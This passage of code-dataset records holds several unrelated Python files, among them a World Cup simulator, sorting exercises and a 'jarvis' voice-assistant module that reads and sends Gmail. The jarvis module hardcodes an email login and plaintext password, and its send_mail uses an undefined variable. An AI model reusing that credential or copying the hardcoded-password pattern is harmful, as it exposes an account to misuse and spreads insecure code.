* sum(atk)/len(atk) / mediaGolsSelecao\r\ndefenseMedio = 2 * sum(defense)/len(defense) * sum(defense)/len(defense) / mediaGolsSelecao\r\n\r\nfor i in range(len(times)):\r\n atk[i] = atk[i] / sqrt(atkMedio)\r\n defense[i] = defense[i] / sqrt(defenseMedio)\r\n #print(\"{:.2f} | {:.2f} ->\\t{}\".format(atk[i], defense[i], times[i]))\r\n\r\nvogal = [ 'o', 'a', 'a', 'o', 'a', 'a', 'o', 'o', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'a', 'o', 'a', 'o', 'o', 'a' ]\r\n\r\ngramaticaCampeao = []\r\nfor letra in vogal:\r\n if letra == 'a':\r\n gramaticaCampeao.append('')\r\n else:\r\n gramaticaCampeao.append('o')\r\n\r\nvezesCampeao = []\r\nfor num in times:\r\n vezesCampeao.append(0)\r\n\r\npontos = []\r\nfor i in times:\r\n pontos.append(0)\r\n\r\ngrupoA, grupoB, grupoC, grupoD, grupoE, grupoF, grupoG, grupoH, eliminatorias = [], [], [], [], [], [], [], [], []\r\ngrupos = [grupoA, grupoB, grupoC, grupoD, grupoE, grupoF, grupoG, grupoH]\r\nnomeGrupos = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\r\n\r\nfor i in range(0,len(times),4):\r\n grupos[i//4].append(times[i])\r\n grupos[i//4].append(times[i+1])\r\n grupos[i//4].append(times[i+2])\r\n grupos[i//4].append(times[i+3])\r\n \r\nwhile True:\r\n if lightSpeed:\r\n gameMode = 1\r\n break\r\n else:\r\n gameMode = input(\"Escolha modo de jogo: [PADRAO] = 0 | [TURBO] = 1\\n\")\r\n if gameMode == '0' or gameMode == '1':\r\n break\r\n else:\r\n print(\"Valor invalido! 
Tente novamente...\\n\")\r\ngameMode = int(gameMode)\r\n\r\ndef order_map(key, value, x = 2):\r\n if len(key) != len(value):\r\n return \"Error in length of key and value\"\r\n while x != 0 and x != 1:\r\n x = int(input(\"Ordem crescente -> 0 | decrescente -> 1:\\n\"))\r\n if (x > 1 or x < 0):\r\n print(\"Try again:\")\r\n ordenator = []\r\n copia = []\r\n for i in range(len(value)):\r\n copia.append(value[i])\r\n menor = value[0]\r\n for i in range(1,len(value)):\r\n if menor > value[i]:\r\n menor = value[i]\r\n for j in range(len(key)):\r\n maior = menor\r\n for i in range(len(value)):\r\n if maior <= value[i]:\r\n maior = value[i]\r\n index = i\r\n ordenator.append(index)\r\n value[index] = menor-1\r\n for i in range(len(copia)):\r\n value[i] = copia[i]\r\n k = []\r\n v = []\r\n for i in range(len(key)):\r\n k.append(key[ordenator[i]])\r\n v.append(value[ordenator[i]])\r\n for i in range(len(k)):\r\n if x == 0:\r\n key[i] = k[len(k)-i-1]\r\n value[i] = v[len(v)-i-1]\r\n else:\r\n key[i] = k[i]\r\n value[i] = v[i]\r\n\r\ndef fat(y):\r\n if y == 0:\r\n return 1\r\n num = 1\r\n dec = y\r\n while dec-1:\r\n num *= dec\r\n dec -= 1\r\n return num\r\n\r\ndef findIndex(x):\r\n for i in range(len(times)):\r\n if times[i] == x.upper():\r\n return i\r\n return -1\r\n\r\ndef findLambda(A, B, extraTime = False):\r\n indexA = findIndex(A)\r\n indexB = findIndex(B)\r\n lambdaA = atk[indexA] * defense[indexB]\r\n lambdaB = atk[indexB] * defense[indexA]\r\n if extraTime:\r\n lambdaA = lambdaA / 3.0\r\n lambdaB = lambdaB / 3.0\r\n else:\r\n if not lightSpeed:\r\n print(\"Resultado esperado: {} {:.2f} vs {:.2f} {}\".format(A, lambdaA, lambdaB, B))\r\n return lambdaA, lambdaB\r\n\r\ndef draftGoal(lista):\r\n newList = []\r\n for i in range(len(lista)):\r\n for j in range(int(lista[i])):\r\n newList.append(i)\r\n rnd = randint(0,len(newList)-1)\r\n return newList[rnd]\r\n\r\ndef poisson(A, B, extraTime = False):\r\n lambdaA, lambdaB = findLambda(A, B, extraTime)\r\n P1 = []\r\n P2 = []\r\n for i in range(9):\r\n result = (e**(-1*lambdaA) * lambdaA**i) / (fat(i)*1.0)\r\n P1.append(1000*result)\r\n result = (e**(-1*lambdaB) * lambdaB**i) / (fat(i)*1.0)\r\n P2.append(1000*result)\r\n golsA = draftGoal(P1)\r\n golsB = draftGoal(P2)\r\n return golsA, golsB\r\n\r\ndef match(A, B, knockOut = True, grupo = []):\r\n if not lightSpeed:\r\n print(\"\\n========================================================================================================================\\n\")\r\n print(\"\\nPARTIDA:\", A.upper(), \"x\", B.upper())\r\n print()\r\n if not gameMode:\r\n sleep(1.5)\r\n golsA, golsB = poisson(A, B)\r\n goalStamps = []\r\n sideScoring = []\r\n for i in range(golsA):\r\n sideScoring.append(0)\r\n for i in range(golsB):\r\n sideScoring.append(1)\r\n for i in range(golsA + golsB):\r\n while True:\r\n stamp = randint(1,90)\r\n if stamp not in goalStamps:\r\n goalStamps.append(stamp)\r\n break\r\n shuffle(sideScoring)\r\n count = 0\r\n placarA = 0\r\n placarB = 0\r\n for tempo in range(1, 91):\r\n if tempo in goalStamps:\r\n if sideScoring[count]:\r\n placarB += 1\r\n else:\r\n placarA += 1\r\n if not lightSpeed:\r\n goalEvent(A, B, sideScoring[count], placarA, placarB, tempo)\r\n count += 1\r\n else:\r\n if not lightSpeed:\r\n otherEvents(A, B, tempo)\r\n if not gameMode:\r\n sleep(0.1)\r\n if lightSpeed:\r\n global jogos, gols\r\n jogos += 1\r\n gols = gols + golsA + golsB\r\n if not knockOut:\r\n indexA = findIndex(A)\r\n indexB = findIndex(B)\r\n if golsA > golsB:\r\n pontos[indexA] = pontos[indexA] + 3 + 
0.01*(golsA-golsB) + 0.0001*golsA\r\n pontos[indexB] = pontos[indexB] + 0.25 + 0.01*(golsB-golsA) + 0.0001*golsB\r\n elif golsB > golsA:\r\n pontos[indexB] = pontos[indexB] + 3 + 0.01*(golsB-golsA) + 0.0001*golsB\r\n pontos[indexA] = pontos[indexA] + 0.25 + 0.01*(golsA-golsB) + 0.0001*golsA\r\n else:\r\n pontos[indexA] = pontos[indexA] + 1 + 0.0001*golsA\r\n pontos[indexB] = pontos[indexB] + 1 + 0.0001*golsB\r\n\r\n else:\r\n if golsA > golsB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n elif golsB > golsA:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if not lightSpeed:\r\n print(\"FIM DO TEMPO REGULAMENTAR! VAMOS PARA A PRORROGACAO!\\n\")\r\n prorrogacao(A, B, placarA, placarB)\r\n \r\n if not lightSpeed:\r\n print(\"FINAL DE PARTIDA:\",A.upper(),golsA,'x',golsB,B.upper())\r\n if not knockOut:\r\n showTable(grupo)\r\n if not gameMode:\r\n input(\"\\nPartida terminada. Pressione ENTER para continuar...\")\r\n if not lightSpeed:\r\n print()\r\n\r\ndef prorrogacao(A, B, placarA, placarB):\r\n if not lightSpeed:\r\n print(\"PRORROGACAO!\\n\")\r\n if not gameMode:\r\n sleep(1.5)\r\n golsA, golsB = poisson(A, B, True)\r\n goalStamps = []\r\n sideScoring = []\r\n for i in range(golsA):\r\n sideScoring.append(0)\r\n for i in range(golsB):\r\n sideScoring.append(1)\r\n for i in range(golsA + golsB):\r\n while True:\r\n stamp = randint(91,120)\r\n if stamp not in goalStamps:\r\n goalStamps.append(stamp)\r\n break\r\n shuffle(sideScoring)\r\n count = 0\r\n for tempo in range(91, 121):\r\n if tempo in goalStamps:\r\n if sideScoring[count]:\r\n placarB += 1\r\n else:\r\n placarA += 1\r\n if not lightSpeed:\r\n goalEvent(A, B, sideScoring[count], placarA, placarB, tempo)\r\n count += 1\r\n else:\r\n if not lightSpeed:\r\n otherEvents(A, B, tempo)\r\n if not gameMode:\r\n sleep(0.1)\r\n if golsA > golsB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n elif golsB > golsA:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if not lightSpeed:\r\n print(\"FIM DA PRORROGACAO! O JOGO SERA DECIDIDO NOS PENALTIS! 
HAJA CORACAO!\\n\")\r\n penaltis(A, B)\r\n\r\ndef penaltis(A, B):\r\n vez = True\r\n placarPenaltiA = 0\r\n placarPenaltiB = 0\r\n contaCobrancas = 0\r\n while True:\r\n if vez:\r\n if cobraPenalti(A):\r\n placarPenaltiA += 1\r\n vez = False\r\n else:\r\n if cobraPenalti(B):\r\n placarPenaltiB += 1\r\n vez = True\r\n contaCobrancas += 1\r\n if (contaCobrancas >= 10 and vez and placarPenaltiA != placarPenaltiB) or ((contaCobrancas == 8 or contaCobrancas == 9) and abs(placarPenaltiA - placarPenaltiB) >= 2) or ((contaCobrancas == 6 or contaCobrancas == 7) and abs(placarPenaltiA - placarPenaltiB) >= 3):\r\n break\r\n if placarPenaltiA > placarPenaltiB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n\r\ndef cobraPenalti(time):\r\n if not lightSpeed:\r\n print(\"{} VAI COBRAR O PENALTI...\".format(time.upper()))\r\n if not gameMode:\r\n sleep(1)\r\n rnd = randint(1,10)\r\n if rnd < 4:\r\n if not lightSpeed:\r\n print(\"PERDEU!\\n\")\r\n return False\r\n if not lightSpeed:\r\n print(\"GOOOOL!\\n\")\r\n return True\r\n\r\ndef otherEvents(A, B, tempo):\r\n rnd = randint(0,1)\r\n if rnd:\r\n randomTeam = B.upper()\r\n index = findIndex(B)\r\n else:\r\n randomTeam = A.upper()\r\n index = findIndex(A)\r\n event = randint(1, 1350)\r\n if event == 1:\r\n print(\"Que situacao! Torcedor revoltado entra em campo pra protestar aos\", tempo, \"minutos, mas eh detido a tempo!\\n\")\r\n elif event < 4:\r\n print(\"Bandeirinha atento! {}\".format(vogal[index].upper()), randomTeam, \"ja ia marcando um gol aos\", tempo, \"minutos, mas o artilheiro tava na banheira.\\n\")\r\n elif event < 56:\r\n print(\"Falta pr{}\".format(vogal[index]), randomTeam, \"cobrar. Jogador adversario tomou o amarelo aos\", tempo, \"minutos de jogo.\\n\")\r\n elif event < 61:\r\n print(\"Expulso o defensor d{}\".format(vogal[index]), randomTeam, \"depois de uma falta dura aos\", tempo, \"minutos!\\n\")\r\n\r\ndef goalEvent(A, B, side, placarA, placarB, tempo):\r\n if not side:\r\n timeGol = A.upper()\r\n index = findIndex(A)\r\n else:\r\n timeGol = B.upper()\r\n index = findIndex(B)\r\n tipo = randint(0,100)\r\n if tipo == 0:\r\n print(\"Ih rapaz... O goleirao falhou! Entregou pr{}\".format(vogal[index]), timeGol, \"marcar aos\", tempo, \"minutos!\")\r\n elif tipo < 21:\r\n print(\"Gol de escanteio d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 41:\r\n print(\"Gol de cabeca d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 56:\r\n print(\"Golaco de longe d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 81:\r\n print(\"Golaco! 
Jogada trabalhada d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 91:\r\n print(\"Gol de puro talento em jogada individual d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 96:\r\n print(\"Golaco de falta d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n else:\r\n print(\"Gol de penalti d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n print(A.upper(), placarA, \"x\", placarB, B.upper())\r\n print()\r\n\r\ndef showTable(grupo):\r\n try:\r\n indexInicial = findIndex(grupo[0])\r\n timesGrupo = [grupo[0], grupo[1], grupo[2], grupo[3]]\r\n pontosGrupo = [pontos[indexInicial], pontos[indexInicial+1], pontos[indexInicial+2], pontos[indexInicial+3]]\r\n order_map(timesGrupo, pontosGrupo, 1)\r\n if not lightSpeed:\r\n print()\r\n for i in range(4):\r\n print(\"{}: {:.0f} pts ->\\t{}\".format(i+1,pontosGrupo[i],timesGrupo[i]))\r\n except:\r\n pass\r\n\r\ndef avanco(grupo):\r\n indexInicial = findIndex(grupo[0])\r\n timesGrupo = [grupo[0], grupo[1], grupo[2], grupo[3]]\r\n pontosGrupo = [pontos[indexInicial], pontos[indexInicial+1], pontos[indexInicial+2], pontos[indexInicial+3]]\r\n order_map(timesGrupo, pontosGrupo, 1)\r\n eliminatorias.append(timesGrupo[0])\r\n eliminatorias.append(timesGrupo[1])\r\n if not lightSpeed:\r\n print(\"{} e {} avancaram pras oitavas de final!\".format(timesGrupo[0], timesGrupo[1]))\r\n if not gameMode:\r\n input(\"\\nPressione ENTER para continuar...\")\r\n if not lightSpeed:\r\n print()\r\n\r\ndef playGrupo(grupo):\r\n match(grupo[0], grupo[1], False, grupo)\r\n match(grupo[2], grupo[3], False, grupo)\r\n match(grupo[0], grupo[2], False, grupo)\r\n match(grupo[1], grupo[3], False, grupo)\r\n match(grupo[0], grupo[3], False, grupo)\r\n match(grupo[1], grupo[2], False, grupo)\r\n avanco(grupo)\r\n\r\ndef playOitavas(grupo):\r\n match(grupo[0], grupo[3])\r\n match(grupo[4], grupo[7])\r\n match(grupo[8], grupo[11])\r\n match(grupo[12], grupo[15])\r\n match(grupo[1], grupo[2])\r\n match(grupo[5], grupo[6])\r\n match(grupo[9], grupo[10])\r\n match(grupo[13], grupo[14])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA AS QUARTAS:\")\r\n for i in range(16,24):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playQuartas(grupo):\r\n match(grupo[16], grupo[17])\r\n match(grupo[18], grupo[19])\r\n match(grupo[20], grupo[21])\r\n match(grupo[22], grupo[23])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA A SEMI:\")\r\n for i in range(24,28):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playSemi(grupo):\r\n match(grupo[24], grupo[25])\r\n match(grupo[26], grupo[27])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA A GRANDE FINAL:\")\r\n for i in range(28,30):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playFinal(grupo):\r\n match(grupo[28], grupo[29])\r\n\r\nif lightSpeed:\r\n while True:\r\n numSimuls = input(\"Quantas simulacoes rodar? \")\r\n try:\r\n numSimuls = int(numSimuls)\r\n if numSimuls > 0:\r\n inicio = time()\r\n break\r\n else:\r\n print(\"Valor invalido! Tente novamente...\")\r\n except:\r\n print(\"Valor invalido! 
Tente novamente...\")\r\n \r\nelse:\r\n numSimuls = 1\r\n\r\nfor i in range(numSimuls):\r\n pontos = []\r\n for i in times:\r\n pontos.append(0)\r\n eliminatorias = []\r\n\r\n if not lightSpeed:\r\n print(\"Comeca a COPA DO MUNDO!\\n\")\r\n contaGrupo = 0\r\n for grupo in grupos:\r\n if not lightSpeed:\r\n print(\"\\nINICIO DO GRUPO {}!\\n\".format(nomeGrupos[contaGrupo]))\r\n playGrupo(grupo)\r\n contaGrupo += 1\r\n\r\n if not lightSpeed:\r\n print(\"\\nCOMECAM AS OITAVAS DE FINAL!\\n\")\r\n playOitavas(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECAM AS QUARTAS DE FINAL!\\n\")\r\n playQuartas(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECA A SEMI FINAL!\\n\")\r\n playSemi(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECA A FINAL!\\n\")\r\n playFinal(eliminatorias)\r\n\r\nif lightSpeed:\r\n if debug:\r\n aux = vezesCampeao[:]\r\n order_map(meta, aux, 1)\r\n order_map(times, vezesCampeao, 1)\r\n print(\"Numero de Simulacoes realizadas: {}\\nTempo de execucao: {:.2f} segundos\".format(numSimuls, time() - inicio))\r\n print(\"Media de gols por jogo: {:.2f}\".format(gols/(jogos*1.0)))\r\n for i in range(len(times)):\r\n if debug:\r\n debugMessage = '\\t\\t[DEVERIA SER: ' + str(meta[i]*numSimuls/10000.0) + ']'\r\n else:\r\n debugMessage = ''\r\n print(\"{}:\\t{}x campeao ->\\t{} {}\".format(i+1, vezesCampeao[i], times[i], debugMessage))\r\n \r\n","sub_path":"copa_do_mundo_2018.py","file_name":"copa_do_mundo_2018.py","file_ext":"py","file_size_in_byte":20614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53549341","text":"# 1. 선택 정렬\r\n\r\n# 2. 버블정렬\r\n# 인접한 2개의 레코드를 비교하여 크기가 순서대로 되어있지 않으면\r\n# 서로 교환하는 비교-교환 과정을 리스트의 왼쪽 끝에서 시작하여 오른쪽\r\n# 끝까지 진행. => 스캔 과정이 이루어짐.\r\n\r\n# 3. 퀵 정렬\r\n#-분할 정복 알고리즘의 하나로, 평균적으로 매우 빠른 수행 속도를 자랑함.\r\n#-리스트를 비균등하게 분할\r\n#-분할 정복 방법\r\n#문제를 작은 2개의 문제로 분리하고 각각을 해결한 다음, 결과를 모아서 원래의 문제를 해결\r\n#순환 호출을 이용하여 구현.\r\n#-과정 설명\r\n#1.리스트 안에 있는 한 요소 선택. => 고른 원소를 피벗(pivot)이라고 함.\r\n#2.피벗을 기준으로 피벗보다 작은 요소들은 모두 피벗의 왼쪽으로 옮겨지고\r\n#피벗보다 큰 요소들은 모두 피벗의 오른쪽으로 옮겨짐.\r\n#3.피벗을 제외한 왼쪽 리스트와 오른쪽 리스트를 다시 정렬한다.\r\n#분할된 부분 리스트에 대하여 순환 호출을 이용하여 정렬을 반복.\r\n#부분 리스트에서도 다시 피벗을 정하고 피벗을 기준으로 2개의 부분 리스트로 나누는 과정 반복.\r\n#4. 
부분 리스트들이 더 이상 분할이 불가능할 때까지 반복.\r\n\r\n#선택정렬\r\ndef selection_sort(data):\r\n    for i in range(len(data)-1):\r\n        min_idx = i\r\n        for k in range(i+1, len(data)):\r\n            if(data[k] < data[min_idx]):\r\n                min_idx = k\r\n        data[i], data[min_idx] = data[min_idx], data[i]\r\n    print(\"selection 정렬 후 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\n#버블정렬\r\ndef bubble_sort(data):\r\n    for i in range(len(data)-1, 0, -1):\r\n        for k in range(0, i):\r\n            if(data[k] > data[k+1]):\r\n                temp = data[k]\r\n                data[k] = data[k+1]\r\n                data[k+1] = temp\r\n    print(\"bubble 정렬 후 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\n#퀵정렬\r\ndef quick_sort(data):\r\n    if len(data) <= 1:\r\n        return data\r\n    pivot = data[len(data) // 2]\r\n    lesser_arr, equal_arr, greater_arr = [], [], []\r\n    for num in data:\r\n        if num < pivot:\r\n            lesser_arr.append(num)\r\n        elif num > pivot:\r\n            greater_arr.append(num)\r\n        else:\r\n            equal_arr.append(num)\r\n    return quick_sort(lesser_arr) + equal_arr + quick_sort(greater_arr)\r\n\r\n# 공통 -> 메인 부분\r\n# (1) p.219 16진수 정렬\r\nimport random\r\n\r\ndata = []\r\n\r\nprint(\"------------16진수 정렬----------------------------\")\r\nif __name__ == \"__main__\":\r\n    for i in range(5):\r\n        temp = hex(random.randrange(0,10000))\r\n        data.append(temp)\r\n    print(\"정렬 전 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\n    print()\r\n    #selection_sort\r\n    selection_sort(data)\r\n    print()\r\n    #bubble_sort\r\n    bubble_sort(data)\r\n    print()\r\n    #quick_sort\r\n    data = quick_sort(data)\r\n    print(\"quick 정렬 후 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\nprint()\r\n\r\n# (2) p.283 문자, 숫자 정렬\r\nimport random\r\n\r\ndata = []\r\nprint(\"------------문자, 숫자 정렬---------------------------\")\r\n## 메인 코드 부분 ##\r\nif __name__ == \"__main__\":\r\n    for i in range(5):\r\n        temp = hex(random.randrange(0, 10000))\r\n        temp = temp[2:]\r\n        data.append(temp)\r\n    print(\"정렬 전 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\n    print()\r\n    # selection_sort\r\n    selection_sort(data)\r\n    print()\r\n    # bubble_sort\r\n    bubble_sort(data)\r\n    print()\r\n    # quick_sort\r\n    data = quick_sort(data)\r\n    print(\"quick 정렬 후 데이터 : \", end='')\r\n    [print(num, end=' ') for num in data]\r\n","sub_path":"강의자료/2019-06-10/Code04-Mission1 - 선택, 버블, 퀵 정렬.py","file_name":"Code04-Mission1 - 선택, 버블, 퀵 정렬.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"639219062","text":"\n\nimport imaplib\nimport email\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib\nimport speech_recognition as sr\nimport serial\nimport time\nimport webbrowser\nimport pyttsx3\nimport threading\n\ndef delay_function(command):\n    try:\n        command, delay_time = command.lower().split()[-2:]\n    except ValueError:\n        return\n    try:\n        delay_time = int(delay_time)\n    except ValueError:\n        return 0\n    if command == \"delay\":\n        time.sleep(delay_time)\nclass main:\n\n    def __init__(self):\n        pass\n\n    def search_algorithm(self, commands, functions, command_string, command_start, delay_function=delay_function):\n        # scan the transcript for every occurrence of each jarvis command phrase\n        command_position = []\n        for command in range(len(commands)):\n            for command_str in range(len(commands[command])):\n                position = 0\n                next_cheack_position = 0\n                current_search_command = f\"jarvis {commands[command][command_str]}\"\n                while position != -1:\n                    position = command_string.find(current_search_command, next_cheack_position)\n                    next_cheack_position = position+1\n                    if position != -1:\n                        
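# record the command index, string variant, and character span of this match\n                        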
command_position.append(\n [\n command,\n command_str,\n [\n position,\n (position+len(current_search_command))\n ]\n ]\n )\n currected_list = []\n sorted_list = [None]*len(command_position)\n\n gide_list_endpoint= [sum(i[2]) for i in command_position]\n gide_list_startpoint= [sum(i[2]) for i in command_position]\n gide_list_endpoint.sort()\n\n for position in range(len(command_position)):\n index = gide_list_endpoint.index(gide_list_startpoint[position])\n sorted_list[index] = command_position[position]\n \n for items in range(len(sorted_list)):\n strip_position_1 = sorted_list[items][2][1]\n try:\n strip_position_2 = sorted_list[items+1][2][0]\n sorted_list[items].append(command_string[strip_position_1:strip_position_2])\n except:\n sorted_list[items].append(command_string[strip_position_1:])\n\n \n def function_runner(command, function):\n delay_function(command)\n function(command)\n\n for command_data in sorted_list:\n fucnction_to_run = functions[command_data[0]]\n string_after_command = command_data[3]\n thread = threading.Thread(target=function_runner, args=(string_after_command, fucnction_to_run))\n thread.start()\n\n\n\n\n def speach_get(self, time_len):\n data = \"\"\n r = sr.Recognizer()\n r.dynamic_energy_threshold = True\n print(sr.Microphone.list_microphone_names())\n print(\"Speak:\")\n \n try:\n with sr.Microphone(sample_rate = 20000, chunk_size = 2048) as d:\n audio = r.listen(d, phrase_time_limit=time_len)\n print(\"done\")\n except Exception as e:\n print(e)\n print(\"sorry\")\n \n try:\n data = r.recognize_google(audio)\n print(\"You said \" + data)\n except sr.UnknownValueError:\n print(\"Could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n return data\n\n def read_mail(self):\n do = True\n \n try:\n m = imaplib.IMAP4_SSL(\"imap.gmail.com\", 993)\n m.login(\"jarvisbackchat@gmail.com\",\"Pickles123505992299505321123505992\")\n m.select(\"inbox\")\n except Exception as e:\n return None\n do=False\n if do:\n result, bent = m.uid('search', None, \"ALL\") # search all email and return uids\n prev = 0\n with open(\"backchatmail.txt\", \"r\") as opener:\n for i in opener:\n prev = int(i)\n if result == 'OK':\n for num in bent[0].split()[prev-1:]:\n if int(num) > prev:\n \n result, data = m.uid('fetch', num, '(RFC822)')\n if result == 'OK':\n email_message = email.message_from_bytes(data[0][1]) # raw email text including headers\n print('From:' + email_message['From'])\n try:\n print('subject:' + email_message['Subject'])\n except:\n pass\n try:\n try:\n do = email_message.get_payload()[ 0 ].get_payload()\n except:\n do = email_message.get_payload()\n print(email_message['From'].split(\"<\", 1)[1].split(\">\"))\n except:\n pass \n m.close() \n m.logout()\n with open(\"backchatmail.txt\", \"w\") as opener:\n zd = bent[0].split()\n opener.write(str(len(bent[0].split())+1)) \n return do\n\n def send_mail(self, toaddr, body):\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"automated bounce back\"\n msg.attach(MIMEText(body, 'plain'))\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n b = True\n while b:\n try:\n server.login(\"jarvisbackchat@gmail.com\", \"Pickles123505992299505321123505992\")\n text = msg.as_string()\n server.sendmail(\"jarvisbackchat@gmail.com\", toaddr, text)\n b = False\n except:\n pass\n\nif __name__ == \"__main__\":\n 
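# library module: the jarvis class above is imported by the assistant entry point; nothing to demo when this file runs directly\n    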
pass\n","sub_path":"imports/jarvis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381579968","text":"# -*- coding: utf-8 -*-\nfrom zope import schema\n\nfrom bika.lims import messagefactory as _\nfrom bika.lims.interfaces.samplepoint import ISamplePoint\nfrom bika.lims.interfaces.sampletype import ISampleType\nfrom plone.app.vocabularies.catalog import CatalogSource\nfrom plone.supermodel import model\nfrom z3c.relationfield import RelationChoice\n\nclass ISample(model.Schema):\n \"\"\"Represents the original sample.\n \"\"\"\n\n sample_type = RelationChoice(\n title=_(u\"Sample Type\"),\n source=CatalogSource(object_provides=ISampleType.__identifier__),\n required=True,\n )\n\n sample_point = RelationChoice(\n title=_(u\"Sample Point\"),\n source=CatalogSource(object_provides=ISamplePoint.__identifier__),\n required=False,\n )\n\n client_sample_id = schema.TextLine(\n title=_(u\"Client Sample ID\"),\n description=_(u\"The ID assigned to the sample by the client\"),\n required=False,\n )\n\n date_sampled = schema.Datetime(\n title=_(u\"Date Sampled\"),\n required=False,\n )\n","sub_path":"src/bika/lims/interfaces/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649328297","text":"model_path = 'model_data/merged_model_v1.0.h5'\nanchors_path = 'model_data/drone_anchors.txt'\nclasses_path = 'model_data/one_class.txt'\nclassification_model_path = 'model_data/drone_bird_classification_model_v1.0.h5'\npre_score = 0.8\nmid_score = 0.8\nnext_score = 0.8\nbig_score = 0.5\niou = 0.1\nmodel_image_size = (1120, 1120)\ngpu_num = 1\n\nbird_label = 0\ndrone_label = 1\nflying_label = 2\nreference_fps = 25\narea_threshold = 0.0001593458 # corresponds to 100 for solution 572 x 768\ndrone_speed_threshold = 0.006510416 # corresponds to 5 for image width 768\nbird_speed_threshold = 0.015625 # corresponds to 12 for image width 768\n# appear_threshold = 0.7\nbbox_matching_threshold = 0.5\ncompute_camera_velocity = False\n","sub_path":"backend/app/api/checkin/utils_pro/enum_model.py","file_name":"enum_model.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600184912","text":"'''\n#USE SAME INDEX AND BASE FILES OF PREVIOUS EXAMPLE\n#FLASHING MESSAGES\nThis program helps you to render HTML template in flask.We are creating a form in html and we are processing the entered values\nYou should create an HTML file inside a folder called \"templates\"\nin the same directory\n'''\nfrom flask import flash\nfrom flask import Flask #import the Flask object from the flask package\nfrom flask import render_template#for rendering html 